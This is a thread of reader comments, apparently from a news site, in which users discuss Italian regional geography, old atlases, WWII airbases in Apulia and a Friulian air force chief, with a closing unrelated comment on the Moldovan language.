of a thesis, a reaction to a proposition, if there is not a previous thesis or proposition? Unless you consider that a mere geographical fact is a thesis, but you accepted this fact (because it's a fact and you had to accept it). Hence the impossibility of a synthesis... =:-o Suppose I replied "yes, but Brindisi was the free provisional capital of the co-belligerent Kingdom of Italy in 1943-44 while Trieste was occupied by the Germans"... You would be flabbergasted, or perhaps could reply "yes, but in 1945 Trieste was occupied by the Yugoslavs and the Allies", etc, Digression is like alcohol, there must be a limit, otherwise... As a matter of fact, my "useful skill" concerning cartography, maps, etc had something to do with wars, past, present or... future. By the way, I could tell you a few stories about Foggia, another important city of Apulia, and about the Foggia Airfield Complex. At that time Apulia was immensely more important strategically than the zone around Venice and Trieste, especially concerning Western and Central Europe and the Balkans. The Italian Air Force still has the very important base of Gioia del Colle, I don't like football, I don't even know if Trieste and Brindisi have teams... :-) Don't understimate non-Italians and their knowledge of Italy and the Italian culture and language. As for maps, etc the old Istituto Geografico di Novara/De Agostini was one of the most prestigious in the world. I used to have many of its maps and publications. And... By the way, do you know this lady? "Nor did I wish to sound presumptuous, but I am shocked a non-Italian would possess (and cite) Fabbri Editori and the "Nuovissimo Atlante Universale". ------------------- "Shocked"? It must be an irony or am exaggeration of yours, otherwise what kind of non-Italian people do you know? Yes, my vecchio ma Nuovissimo Atlante Universale, I possess it because it's my possession, I own it, I cite it, it's mine, it's my private property because I paid 7,500 lire for it (IVA compresa),... I like it, we have been together for 35 years, and I could kill anyone who tried to take it away from me! All my other atlases, much older and much newer, much better and much prettier, are jealous of it, but this is... MY Nuovissimo Atlante Universale! OK? Accrux - please! I heard you the first three times. Please accept my humblest apologies for the geographical error. I am a northern Italian - geography is not just about physical geography - it is also political geography and commercial geography. In any case, many thanks for your info. I had no idea the Nuovissimo Atlante Universale was so highly rated outside Italy! Sometimes living here, it is difficult to distinguish between which are provincial-minded boasts and which are legitimate. I was actually IN Brazzano (Cormòns) today, visiting a friend. There are many Visintin's (or Vizintin's) in the area - although the surname typically belongs to regions a bit further south, closer to the Adriatic Sea. Another famous connection to the world of Geography from Brazzano: Foggia air base was only so critically important because other bases further northward had not been captured yet. And yes, I am quite aware of Professor Jan Karski's direct request conveyed from the Polish Home Army and the Jewish Underground in 1943 to bombard Auschwitz from the captured base in Foggia - the first time the Allies possessed such a base within range of southern Poland. One might say that the Foggia airbase almost demonstrates Anglo-American "complicity" in the Holocaust... No, I was not familiar with the figure of Adele Bianchi. Very interesting. Gioia del Colle Airbase was used by Italian and British Typhoons and Tornados during the intervention in Libya last year. BTW, the current Chief of Staff of the Italian Air Force is the Friulian General Giuseppe Bernardis. He has just released a book revealing the details of Italian participation in Libya - and has attempted to spark a public debate about these activities, given that he is opposed to the hypocrisy and public silence regarding them. To wit: "Why do we continue to pretend we do not have legitimate European and national interests to defend and deny publicly that we are bombing?" (As in Kosovo, Afghanistan and Libya, for example). I promise I will not underestimate YOUR knowledge of Italy and Geography - as to other non-Italians, I will reserve the right to form my own judgment. BTW, I picked up in Ann Arbor a decade ago an original copy in German of Von Drygalski's South Polar Expedition, published in Berlin in 1904 (or was it 1905?) I also purchased an original first edition of Layard's "Nineveh and its Remains" - 1849. (I sold both for a good profit which paid for my ticket to the US - the former to an Austrian Alpinist friend and the latter to an Iranian Assyrian friend.) Milovan, it's YOU who have kept repeating the same antithesis-without-thesis three times or more... so you virtually obliged me to repeat my 'disclaimer' three times... I couldn't care less about your minor geographical error, sorry if I forgot to add the emoticon... So please don't go to Canossa (it must be very cold at this time of the year), it's not necessary. I don't think the NAU is so highly rated outside Italy, it's just a personal thing of mine, and also the day I bought it and the woman I was with when I bought it and the book I bought for her and the book she bought for me, and the rain, and... Well, I was and am a romantic, I can't help it. Hence Brazzaville, on the Congo river. Yes, there's always a reason for everything, I bet the USAAF and the RAF would have preferred air bases in Yugoslavia and Lombardy but... Do you have anything against Apulia? You keep belittling it. Not that I care, I just wonder. Alas, yes... I know, I know, that old AFB became known because of that. Thank you for the information about the FRIULIAN (Yes, Friulian) General Giuseppe Bernardis and the link, I will read it. All right, I couldn't care less about other non-Italians, I am an individual rather than collective person, which is why I never speak on other people's behalf, only on my own. Anyway, PLEASE correct me everytime I say anything wrong about Italy (or geography or any other thing), I want to learn, not to win football matches. " ... geography is not just about physical geography - it is also political geography and commercial geography." ---------------------- Really? Well, I would add human geography, historical geography, military geography, &c. Like Théophile Lavallée's GÉOGRAPHIE PHYSIQUE, HISTORIQUE ET MILITAIRE, Paris, G. Charpentier, Éditeur, 1882, one of the many books about geography I have. "Really? Well, I would add human geography, historical geography, military geography, &c. Like Théophile Lavallée's GÉOGRAPHIE PHYSIQUE, HISTORIQUE ET MILITAIRE, Paris, G. Charpentier, Éditeur, 1882, one of the many books about geography I have." Well said! Yes, I do have something against Apulians - based on experience, not prejudice. A long story... And, you see, Friuli and Liguria are two of the most serious regions/peoples when it comes to military matters - so yes, the fact that a Friulian Chief of Staff is rebelling against a certain ludicrousness in Italy is significant - and deserves to be supported. Bernardis is saying, essentially, that a democratic society should not conduct its defence and foreign policies in such a hypocritical fashion - and he is right. I very much doubt an Apulian Chief of Staff would have bothered to make that point. Not that all Southerners are alike. They are not. The Apulians, for example, are Italian-speaking Greeks. "Yes, I do have something against Apulians - based on experience, not prejudice. A long story..." --------------------- Well, that became pretty obvious as I kept reading your posts, but you don't have to worry about me, I couldn't care less, I have never been to Apulia and I don't recall having met any pugliese. As a matter of fact I lived in Rome, which as you know well is halfway between Northern Italy and Southern Italy. And Rome is Rome. Magna Graecia, yes... There's no such language as Moldovan; it was/is Russian propaganda aimed at creating a false national identity. The language spoken in the Republic of Moldova is identical to Romanian, not similar. Indeed, we all ask you ASAP to CORRECT THE MISTAKE ABOUT THE LANGUAGE! This is an offence to our people, especially mentioning the "similar to Romanian" part! What is your source of information?
http://www.economist.com/comment/1792972
CC-MAIN-2014-52
refinedweb
15,342
61.77
Details Description. Activity - All - Work Log - History - Activity - Transitions Thanks for the ping. I'll work up a new patch in a few days if nobody else wants to take it (dont hesitate), I'm just currently working on some other issues right now. Ivy parts should be pretty easy either way. Noggit is now up on Maven Central.. Funny you ask, When I submitted the bundle I received the same 'Staging Completed' notification as I did when I submitted langdetect. A relevant snippet from the email: The following artifacts have been staged to the Central Bundles-102 (u:MYUSERNAME, a:122.59.251.231) repository. with all the appropriate artifacts listed. Just today I received a 'Staging Repository Dropped' notification with only the following information: The Central Bundles-102 (u:MYUSERNAME, a:122.59.251.231) staging repository has been dropped. When langdetect was accepted, I received a 'Promotion Completed' email, so I think this is a bad sign but I've received no information about why it was rejected and don't know how to proceed further. Chris, I don't see org.noggit:noggit up on Maven Central yet, so I guess your request has hit a snag - do you know what's happening? I have submitted it for processing, we'll see how things go. Improved version. Attaching the POM that I will be using for the noggit release. Chris: thank you! This fell off my radar a little as I became distracted by other issues, but I'll prepare a release and submit it to Sonatype today. I keep threatening to commit that patch only because: - i think its more legit to have this real release than code-copied from apache labs. I think it undeniably makes our release more clean. - i left the patch up for a month already for someone to go thru whatever that process is to get it in maven. I don't actually follow thru on my threats YET because: - i worry someone will not do the right thing with maven, instead just revert back to fake release of other peoples stuff, which I helped work on to remove. - if someone does such a thing, i feel the maven artifacts are unreleasable, e.g. we are actually back in commons-csv state. So what would we do? exclude maven artifacts from any release candidate in this case and just everyone argues about it? or it falls back on the release manager to deal with? +1 to pull Noggit from it's official release, and stop using the source-copied version. Can someone who understands the Maven side do what's necessary here? Sonatype worked great for langdetect, I think? While Robert's patch for getting Noggit from github does work with Ivy, it means we must also retrieve it with Maven. Can I be of help with getting a full Maven release of Noggit? Would it be preferred if I did it via a 3rd party release like I did with langdetect Patch for adding the commons-csv tests to trunk. Will commit shortly. I became a CSV committer to address all of the issues. Great Yonik. As a CSV committer, could you not initiate a release? On the csv web site, it says: There are currently no official downloads, and will not be until CSV moves out of the Sandbox CSV has moved out of the Sandbox, so what stops you (the team) from taking the code as is and releasing it, perhaps as a 0.x version? patch for noggit: nuking the local copy of noggit (--no-diff-deleted), and using the download instead (changing package names to org.noggit where its used). all tests and javadocs pass. Wait: a lot of effort doing what? I became a CSV committer to address all of the issues. wrt commons-csv alternatives, it's too risky for little/no gain. This confuses me: commons-csv is unreleased, while there are other license-friendly packages (eg opencsv) that have been released for some time (multiple releases), been tested in the field, had bugs found & fixed, etc. Why use an unreleased package when released alternatives are available? I put a lot of effort into getting commons-csv up to snuff, Wait: a lot of effort doing what? Did you have to modify commons-csv sources? Or do you mean open issues w/ the commons devs to fix things/add test cases to commons-csv sources (great!)...? Switching implementations would most likely result in a lot of regressions that we don't have tests for. I'd expect the reverse, ie, it's more likely there are bugs in commons-csv (it's not released and thus not heavily tested) than eg in opencsv. And if somehow that's really the case (eg we have particular/unusual CSV parsing requirements), we should have our own tests asserting so? If the deal is about commons-csv not having a release yet, a much easier (and safer) path seems to just wait for them to do that and upgrade at that time. I put a lot of effort into getting commons-csv up to snuff, and almost all of the tests for that reside in commons-csv itself, not in Solr I'll bring the tests from common-csv into Solr. ok ill make a patch. of course maven is a separate issue, but ivy can just download that release... Is this safe to cutover to in trunk? Yep, should be exactly the same code (just with different package names of course). First steps: +1 !!!!! Is this safe to cutover to in trunk? I can do the ivy parts. First steps: wrt commons-csv alternatives, it's too risky for little/no gain. I put a lot of effort into getting commons-csv up to snuff, and almost all of the tests for that reside in commons-csv itself, not in Solr. Switching implementations would most likely result in a lot of regressions that we don't have tests for. ps: Steve, you're absolutely correct about the reason why there was never a separate noggit release. If github had been around in 2006, I might have chosen differently. I guess this means "official apache releases" but if the release is done in a private namespace then this isn't a problem? I mean – I could probably take the source right now, change the group id to something I have access to (com.carrotsearch.thirdparty) and release it, but so can Yonik (under his own domain or whatever namespace he wishes that is different than Apache's)? I admit this is kind of weird that Solr is using something that cannot be officially released. Why not make it part of Solr then? Just copy the source code over and publish as a separate artefact? Minor nit about releasing noggit, which is hosted at Apache Labs: from: Guidelines [...] Releases Labs are prohibited from making releases.Labs are prohibited from making releases. I didn't know it's Yonik's actually. It even has a pom.xml file –? Yonik if you have an account at SonaType this takes as much as changing the revision number to something without a SNAPSHOT and an mvn deploy (plus accept from Nexus). Let me know if you need some guidance but it should be a 10 minute effort if you have the maven code ready. I agree that noggit might be the most performant solution. The question is: why is there no release already. If its maintained by Yonik at ASF and sucessfully used in Solr, why not release the version we currently have in maven and use it? If Yonik thinks it's not ready for a release, we should not use it. Similar to what Dawid did, it took him a few hours to make the Carrot 1.5 stuff available via Maven repo. I had originally intended to add noggit to this issue but there is some discussion about replacing it given how very efficient it is. Perhaps its a good idea to, as this issue says, explore alternatives to see whether something else meets our performance needs. I used GSON () and was happy with it. It even contains sanity checks which come in handly if you're emitting insane data... What about apache-noggit? There are lots of other JSON parsers/generators available! Yeah I know. I was just pointing out that it used ASL. BSD or ASL2 – either is fine with another ASL2 project. Yup I received notification today. So all I need to remember in the future is not to submit near the weekend.
https://issues.apache.org/jira/browse/SOLR-3296?attachmentOrder=desc
CC-MAIN-2016-26
refinedweb
1,439
73.58
Report broken link Read reviews Refer to a friend Subscribe Sources mirror 1 (tar.gz)[sources] [6 KB] AxKit::XSP::ESQL is an Extended SQL taglib for AxKit eXtensible Server Pages.SYNOPSISAdd the esql: namespace to your XSP < xsp:page > tag: < xsp:pageAnd add this taglib to AxKit (via httpd.conf or ... [read more >>] Tell us your opinion or ask for help from a fellow Softpedian. NOTE: If you have problems downloading AxKit::XSP::ESQL, please try to stop using your download manager and avoid right clicking on files. Also, check your firewall settings, because some mirrors may require that you do not block the HTTP referers. For further information please read our Downloading FAQ & Guide
http://linux.softpedia.com/progDownload/AxKit-XSP-ESQL-Download-27911.html
CC-MAIN-2013-48
refinedweb
116
64.61
students how to use arrays, many instructors give assignments requiring to use two or three arrays in parallel to represent attributes in what should be classes. While this type of assignment allows students to gain confidence when using arrays, this type of approach becomes very cumbersome to use and difficult to manage, especially as the number of elements stored increases in size and more so as the use of resizable collections like ArrayLists come into play. So let's go ahead and start out with a standard inventory program that uses parallel arrays to store price, quantity and name. This program will display a menu using a JOptionPane window requesting input for adding inventory, updating a current item's status, displaying the inventory, and quitting. If the user wants to update an item, we will display another menu asking for the index of the item to change. After we recieve the index, we will display another menu asking the user if they want to update the name, quantity or price, followed by a prompt for the new value. And as was the requirement when I did the assignment, we'll limit the size of the arrays to 10 items in inventory. import javax.swing.JOptionPane; public class Inventory{ public static void main(String[] args){ /* As we can see, we are starting out with 3 parallel arrays representing quantity, price, and name. Each element in an array lines up with the elements at the corresponding indices in the other two arrays. So quantity[0] represents the same item as price[0] and name[0] */ int[] quantity = new int[10]; //quantity defaults to 0 for all items double[] price = new double[10]; //price defaults to 0 for all items //names default to null, so we can't use an item's name until it is assigned one String[] name = new String[10]; boolean toContinue = true; String input = ""; int menuItem = 0; //holds place so when elements are supposed to be added, the appropriate indices are updated int counter = 0; while(toContinue){ input = JOptionPane.showInputDialog("1) Add an item\n2) Modify an existing item\n3) Display inventory\n4) Exit"); menuItem = Integer.parseInt(input); switch(menuItem){ case 1: //add an item name[counter] = JOptionPane.showInputDialog("Enter the name of this item"); quantity[counter] = Integer.parseInt(JOptionPane.showInputDialog("Enter the quantity available for this item"); price[counter] = Double.parseDouble("Enter the price of this item"); counter++; //go to the next position break; //jump out of the switch case 2: //modify existing item //pick the item int index = Integer.parseInt(JOptionPane.showInputDialog("Which item from 0-9 do you wish to modify?")); //set up the display for the item String item = "Name: " + name[index] + "\nQuantity: " + quantity[index] + "\nPrice: " + price[index]; //prompt for category to update int category = Integer.parseInt(JOptionPane.showInputDialog(item + "\nModify:\n1) Name\n2) Quantity\n3) Price")); //and effect the update if(category == 1) name[index] = JOptionPane.showInputDialog("Enter a new name"); else if(category == 2) quantity[index] = Integer.parseInt(JOptionPane.showInputDialog("Enter a new quantity")); else if(category == 3) price[index] = Double.parseDouble(JOptionPane.showInputDialog("Enter a new price")); break; case 3: //display items String display = ""; for(int i = 0; i < name.length; i++){ //if there isn't a name for an item, we won't display it if(name[i] == null) break; display += name[i] + "\t" + quantity[i] + "\t" + price[i] + "\n"; } //if there are no items in inventory, display such if(display.trim().length() != 0) JOptionPane.showMessageDialog(null, "There are no items in inventory"); //otherwise, display what is in inventory else JOptionPane.showMessageDialog(null,"Name\tQuantity\tPrice\n" + display); break; case 4: //exit System.exit(0); } } } } So far, this program isn't too bad. A few tedious things (beyond getting input) that I noticed included making the display String for a given item, like at this line String item = "Name: " + name[index] + "\nQuantity: " + quantity[index] + "\nPrice: " + price[index];. Consider this though- what would happen if there were no size limitations as to the number of items you could have in inventory (meaning we are now using ArrayLists in parallel instead of static arrays)? When you go to add or remove (which would be the next logical step) items, you wouldn't have to use a counter variable because the ArrayLists would automatically resize as soon as elements are added or removed from them. This gets a little sticky, however, when removing elements in the middle of the lists, as it is very easy to get attributes mixed up. For example, you could remove element 9 for the name list, but end up removing element 8 from the quantity and element 10 from the price list. This would completely mess up the data integrity and accuracy, plus it is very hard to debug this error. Another logical step would be to sort the elements according to one of their attributes (name, quantity or price). Using parallel arrays, you have to enforce each step of the sort amongst all three arrays. So for example, if you sort the quantity array in ascending order, the changes aren't automatically affected throughout the other two arrays. This means that if you call Arrays.sort() on one array, it doesn't necessarily change the other two. And if you call Arrays.sort() on each of the three arrays, you have just sorted three arrays individually, so your name, qunatity and price array are all in order according to the values stored in them. However, you will have mismatched all the attributes from the item they are supposed to describe. Now that we've seen the cons of parallel arrays, let's talk about the advantages of using classes instead. First off, the attributes representing each class are contained within the class. This means that the quantity, price and name cannot get mismatched like we saw when using parallel arrays. This also means that we only have to manage one collection, so it saves memory. Next, we can use methods to make our lives easier. This means that we can set up a toString() method in the class, and when invoked, it will return a nice formatted (to our specifications) String; and we can also use a single setter method so we can eliminate the group of if statements for updating an item. So in short, you are dealing with one variable that holds all the information and can have automated tasks set up instead of having to hard code each component as we saw above. Now that we've discussed the advantages of classes, let's take a look into putting them into use. To start, we'll take a look at designing a class to model an Item. public class Item{ /*notice how each attribute is contained within the class. by doing this, we don't have to worry about mismatching the attributes as seen in parallel arrays */ private int quantity; private double price; private String name; /* when the class is created, the constructor is invoked. this specific constructor allows for the specification of each attribute upon the creation of the object */ public Item(String name, int quantity, double price){ //initialize the attributes this.name = name; this.price = price; this.quantity = quantity; } /* This constructor simply creates a default item with a generic name, none in stock and no price set. It calls the other Item() constructor through the use of the keyword this */ public Item(){ this("New Item",0,0); } /* Basic getter and setter methods for each attribute */ public void setName(String name){this.name = name;} public String getName(){return name;} public void setPrice(double price){this.price = price;} public double getPrice(){return price;} public void setQuantity(int quantity){this.quantity = quantity;} public int getQuantity(){return quantity;} /* this setter method is a little more advanced. it is designed to allow for an easy update of the item by passing a param representing the attribute to update and the new value. @params: -int category: 1- Name, 2- Quantity, 3- Price -String value: represents the new value; will be parsed to appropriate type */ public void update(int category, String value){ switch(category){ case 1: name = value; return; case 2: //value is converted to an int quantity = Integer.parseInt(value); return; case 3: //value is converted to a double price = Double.parseDouble(value); return; } } /* This toString() method makes it very easy to get formatted information about the Item rather than having to go through each of the getter methods individually. Returns name, quantity and price separated by tabs */ public String toString(){ return name + "\t" + quantity + "\t" + price; } } After looking at the Item class, I notice how it is a lot more organized than using parallel arrays, plus it provides a little tighter control on the attributes and more usability through many of its methods, most notably the toString() and update() methods. Now let's redo our Inventory program using the Item class instead of Parallel arrays. import javax.swing.JOptionPane; public class Inventory{ public static void main(String[] args){ //notice how we only use one array instead of 3 //and that the array type is the same as class name //for Item Item[] inventory = new Item[10]; boolean toContinue = true; String input = ""; int menuItem = 0; int counter = 0; while(toContinue){ input = JOptionPane.showInputDialog("1) Add an item\n2) Modify an existing item\n3) Display inventory\n4) Exit"); menuItem = Integer.parseInt(input); switch(menuItem){ case 1: //add an item /* as we see here, we still need to get the input for each attribute but we eliminate a few lines where we had to update each parallel array. instead, we just create a new Item, and increment the counter in the same statement. counter++ will execute after the item has been created in the current index of counter. so if counter = 0, a new Item will be created at inventory[0], then counter increments to 1. */ String name = JOptionPane.showInputDialog("Enter the name of the item"); int quantity = Integer.parseInt(JOptionPane.showInputDialog("Enter the quantity of the item")); double price = Double.parseDouble(JOptionPane.showInputDialog("Enter the price")); inventory[counter++] = new Item(name, quantity, price); break; case 2: //modify an existing item int index = Integer.parseInt(JOptionPane.showInputDialog("Which item from 0-9 do you wish to modify?")); //notice how we just call the toString() method instead of having a line to set up the String display int category = Integer.parseInt(JOptionPane.showInputDialog(inventory[index].toString() + "\nModify:\n1) Name\n2) Quantity\n3) Price")); String value = JOptionPane.showInputDialog("Enter the new value"); //notice how we use the update() method from the given Item and let it update its attributes internally //rather than messing around with determining what parallel array to update and how to parse the values inventory[index].update(category, value); break; case 3: //display items //notice how many fewer lines this takes up than iterating through each parallel array //and appending the information to the display String //Here, the toString() method comes in handy, plus having one array makes the task easier //So we have about 4 lines of code for this part total String display = "Name\tQuantity\tPrice\n"; for(Item i: inventory){ if(i != null) display += i.toString() + "\n"; } JOptionPane.showMessageDialog(null, display); break; case 4: //exit System.exit(0); }//end switch }//end while } } As we can see, this program gives us tighter control over each Item because we don't have to worry about keeping up with which indices represent each Item. This becomes increasingly important as we move onto using resizable collections like ArrayList, and as we attempt to sort the Items by a given attribute (or multiple attributes). We also have the convenience of using methods defined in the Item class, something we didn't have the luxury of doing when using parallel arrays. By using classes instead of parallel arrays, you will begin to get a better handle on Object-Oriented Programming. This will help you as you continue your studies of Java, especially as you come across more advanced OO concepts like inheritance, abstraction and polymorphism, in addition to helping you better organize your program.
http://www.dreamincode.net/forums/topic/147196-moving-away-from-parallel-arrays/
CC-MAIN-2016-26
refinedweb
2,001
50.26
There seem to be a LOT of ways you can get user input in C. What is the easiest way that requires little code? Basically I need to display this: Enter a file name: apple.text The simplest "correct" way is probably this one, taken from Bjarne Stroustrup's paper Learning Standard C++ As A New Language. (Note: I changed Bjarne's code to check for isspace() instead of just end of line. Also, due to @matejkramny's comment, to use while(1) instead of while(true)...and so long as we're being heretical enough to edit Stroustrup's code, I've subbed in C89 comments instead of C++ style too. :-P) #include <stdio.h> #include <ctype.h> #include <stdlib.h> void quit() /* write error message and quit */ { fprintf(stderr, "memory exhausted\n"); exit(1); } int main() { int max = 20; char* name = (char*) malloc(max); /* allocate buffer */ if (name == 0) quit(); printf("Enter a file name: "); while (1) { /* skip leading whitespace */ int c = getchar(); if (c == EOF) break; /* end of file */ if (!isspace(c)) { ungetc(c, stdin); break; } } int i = 0; while (1) { int c = getchar(); if (isspace(c) || c == EOF) { /* at end, add terminating zero */ name[i] = 0; break; } name[i] = c; if (i == max - 1) { /* buffer full */ max += max; name = (char*) realloc(name, max); /* get a new and larger buffer */ if (name == 0) quit(); } i++; } printf("The filename is %s\n", name); free(filename); /* release memory */ return 0; } That covers: Are there simpler but broken solutions, which might even run a bit faster? Absolutely!! If you use scanf into a buffer with no limit on the read size, then your input exceeds the size of the buffer, it will create a security hole and/or crash. Limiting the size of the reading to, say, only 100 unique characters of a filename might seem better than crashing. But it can be worse; for instance if the user meant (...)/dir/foo/bar.txt but you end up misinterpreting their input and overwriting a file called bar.t which perhaps they cared about. It's best to get into good habits early in dealing with these issues. My opinion is that if your requirements justify something close-to-the-metal and "C-like", it's well worth it to consider the jump to C++. It was designed to manage precisely these concerns--with techniques that are robust and extensible, yet still perform well.
https://codedump.io/share/zcdr6FRbXQH6/1/what-is-the-simplest-way-of-getting-user-input-in-c
CC-MAIN-2018-09
refinedweb
403
69.92
1,1 Primary pseudoperfect numbers are the solutions of the "differential equation" n' = n-1, where n' is the arithmetic derivative of n. - Paolo P. Lava, Nov 16 2009 Same as n > 1 such that 1 + sum n/p = n (and the only known numbers n > 1 satisfying the weaker condition that 1 + sum n/p is divisible by n). Hence a(n) is square-free, and is pseudoperfect if n > 1. Remarkably, a(n) has exactly n (distinct) prime factors for n < 9. - Jonathan Sondow, Apr 21 2013 From the Wikipedia article: it is unknown whether there are infinitely many primary pseudoperfect numbers, or whether there are any odd primary pseudoperfect numbers. - Daniel Forgues, May 27 2013 Since the arithmetic derivative of a prime p is p' = 1, 2 is obviously the only prime in the sequence. - Daniel Forgues, May 29 2013 Just as 1 is not a prime number, 1 is also not a primary pseudoperfect number, according to the original definition by Butske, Jaje, and Mayernik, as well as Wikipedia and MathWorld. - Jonathan Sondow, Dec 01 2013 Is it always true that if a primary pseudoperfect number N > 2 is adjacent to a prime N-1 or N+1, then in fact N lies between twin primes N-1, N+1? See A235139. - Jonathan Sondow, Jan 05 2014 Same as n > 1 such that A069359(n) = n - 1. - Jonathan Sondow, Apr 16 2014 Table of n, a(n) for n=1..8. W. Butske, L. M. Jaje, and D. R. Mayernik, On the Equation Sum_{p|N} 1/p + 1/N = 1, Pseudoperfect numbers and partially weighted graphs, Math. Comput., 69 (1999), 407-420. J. M. Grau, A. M. Oller-Marcen, and J. Sondow, On the congruence 1^m + 2^m + ... + m^m == n (mod m) with n|m, arXiv:1309.7941 [math.NT]. J. Sondow and K. MacMillan, Reducing the Erdos-Moser equation 1^n + 2^n + . . . + k^n = (k+1)^n modulo k and k^2, Integers 11 (2011), #A34. J. Sondow and E. Tsukerman, The p-adic order of power sums, the Erdos-Moser equation, and Bernoulli numbers, arXiv:1401.0322 [math.NT], 2014; see section 4. Eric Weisstein's World of Mathematics, Primary pseudoperfect number. Wikipedia, Primary pseudoperfect number. OEIS Wiki, Primary pseudoperfect numbers. A031971(a(n)) (mod a(n)) = A233045(n). - Jonathan Sondow, Dec 11 2013 A069359(a(n)) = a(n) - 1. - Jonathan Sondow, Apr 16 2014 From Daniel Forgues, May 24 2013: (Start) With a(1) = 2, we have 1/2 + 1/2 = (1 + 1)/2 = 1; with a(2) = 6 = 2 * 3, we have 1/2 + 1/3 + 1/6 = (3 + 2 + 1)/6 = (1*3 + 3)/(2*3) = (1 + 1)/2 = 1; with a(3) = 42 = 6 * 7, we have 1/2 + 1/3 + 1/7 + 1/42 = (21 + 14 + 6 + 1)/42 = (3*7 + 2*7 + 7)/(6*7) = (3 + 2 + 1)/6 = 1; with a(4) = 1806 = 42 * 43, we have 1/2 + 1/3 + 1/7 + 1/43 + 1/1806 = (903 + 602 + 258 + 42 + 1)/1806 = (21*43 + 14*43 + 6*43 + 43)/(42*43) = (21 + 14 + 6 + 1)/42 = 1; with a(5) = 47058 (not oblong number), we have 1/2 + 1/3 + 1/11 + 1/23 + 1/31 + 1/47058 = (23529 + 15686 + 4278 + 2046 + 1518 + 1)/47058 = 1. For n = 1 to 8, a(n) has n prime factors: a(1) = 2 a(2) = 2 * 3 a(3) = 2 * 3 * 7 a(4) = 2 * 3 * 7 * 43 a(5) = 2 * 3 * 11 * 23 * 31 a(6) = 2 * 3 * 11 * 23 * 31 * 47059 a(7) = 2 * 3 * 11 * 17 * 101 * 149 * 3109 a(8) = 2 * 3 * 11 * 23 * 31 * 47059 * 2217342227 * 1729101023519 If a(n)+1 is prime, then a(n)*[a(n)+1] is also primary pseudoperfect. We have the chains: a(1) -> a(2) -> a(3) -> a(4); a(5) -> a(6). (end) A primary pseudoperfect number (greater than 2) is oblong if and only if it is not the initial member of a chain. - Daniel Forgues, May 29 2013 If a(n)-1 is prime, then a(n)*(a(n)-1) is a Giuga number (A007850). This occurs for a(2), a(3), and a(5). See A235139 and the link "The p-adic order . . .", Theorem 8 and Example 1. - Jonathan Sondow, Jan 06 2014 (Python) from sympy import primefactors A054377 = [n for n in range(2, 10**5) if sum([n/p for p in primefactors(n)]) +1 == n] # Chai Wah Wu, Aug 20 2014 Cf. A005835, A007850, A069359, A168036, A190272, A191975, A203618, A216825, A216826, A230311, A235137, A235138, A235139, A236433. Sequence in context: A115961 A123137 A014117 * A230311 A007018 A100016 Adjacent sequences: A054374 A054375 A054376 * A054378 A054379 A054380 nonn,more,hard Eric W. Weisstein Title of Butske et al. corrected by Jonathan Sondow, Apr 11 2012 approved
http://oeis.org/A054377
CC-MAIN-2015-06
refinedweb
805
79.7
For the discussion here, we define gateway metrics as metrics that are scoped to the gateway—that is, they measure something about the gateway. Since a gateway contains one or more volumes, a gateway-specific metric is representative of all volumes on the gateway. For example, the CloudBytesUploaded metric is the total number of bytes that the gateway sent to the cloud during the reporting period. This includes the activity of all the volumes on the gateway. When working with gateway metric data, you will specify the unique identification of the gateway that you are interested in viewing metrics for. To do this, you can either specify the GatewayId or the GatewayName. When you want to work with metric for a gateway, you specify the gateway dimension in the metrics namespace, which distinguishes a gateway-specific metric from a volume-specific metric. For more information, see Using the Amazon CloudWatch Console. The following table describes the AWS Storage Gateway metrics that you can use to get information about your gateway. The entries in the table are grouped functionally by measure. In this section, we discuss the AWS Storage Gateway metrics that give you information about a storage volume of a gateway. Each volume of a gateway has a set of metrics associated with it. Note that some volume-specific metrics have the same name as a gateway-specific metric. These metrics represent the same kinds of measurements, but are scoped to the volume instead of the gateway. You must always specify whether you want to work with either a gateway or a storage volume metric before working with a metric. Specifically, when working with volume metrics, you must specify the VolumeId of the storage volume for which you are interested in viewing metrics. For more information, see Using the Amazon CloudWatch Console. The following table describes the AWS Storage Gateway metrics that you can use to get information about your storage volumes.
http://docs.aws.amazon.com/storagegateway/latest/userguide/AWSStorageGatewayMetricsList.html
CC-MAIN-2013-48
refinedweb
322
53.61
Since JDOM represent an API building on standard parsing packages, we can select the way we want the document be loaded from a file. In order to load a JDOM document via SAX we hav to you SAXBuilder class. One of its constructors receives a boolean value, which allows to defined if the document must be validates or not. Sample below shows how it is easilly to load a JDOM document: import org.jdom.Document; import org.jdom.input.SAXBuilder; /** * This sample program showing how to load JDOM document. * using SAX builder. */ public class Test { public static void main(String[] args) { try { // a builder takes a boolean value meaning validation mode: SAXBuilder builder = new SAXBuilder(false); // simply load the document:: Document document = builder.build("sample.xml"); // .. do something ... } catch (Exception ex) { ex.printStackTrace(); } } } You can share your information about this topic using the form below! Please do not post your questions with this form! Thanks.
http://www.java-tips.org/other-api-tips/jdom/reading-a-document-from-xml-file-with-sax-5.html
CC-MAIN-2013-48
refinedweb
155
66.64
CodePlexProject Hosting for Open Source Software Hi, I just tried to use the nuget package (nuget.org/packages/SharpKml) but it is very different from the released version here on codeplex. The nuget package only contains a Google.SharpKml namespace and the project link refers to a 404'ed page at cfreeze. Unfortunately I don't know anything about the NuGet package, sorry. I created SharpKml and host it here for anyone to use, but all I have is the Express version of Visual Studio, as it's just a hobby project, so don't think I can maintain a NuGet project (I believe you need the professional edition?) You can either download the latest code from the source code section on CodePlex or try to get in touch with the author of the package to see if they will update it. Sorry I can't be of anymore help. I don't think you need VS Pro to maintain a NuGet package. Download the command line version and use that to make the package and publish it. Here is some documentation on it. Are you sure you want to delete this post? You will not be able to recover it later. Are you sure you want to delete this thread? You will not be able to recover it later.
http://sharpkml.codeplex.com/discussions/355816
CC-MAIN-2017-30
refinedweb
220
82.65
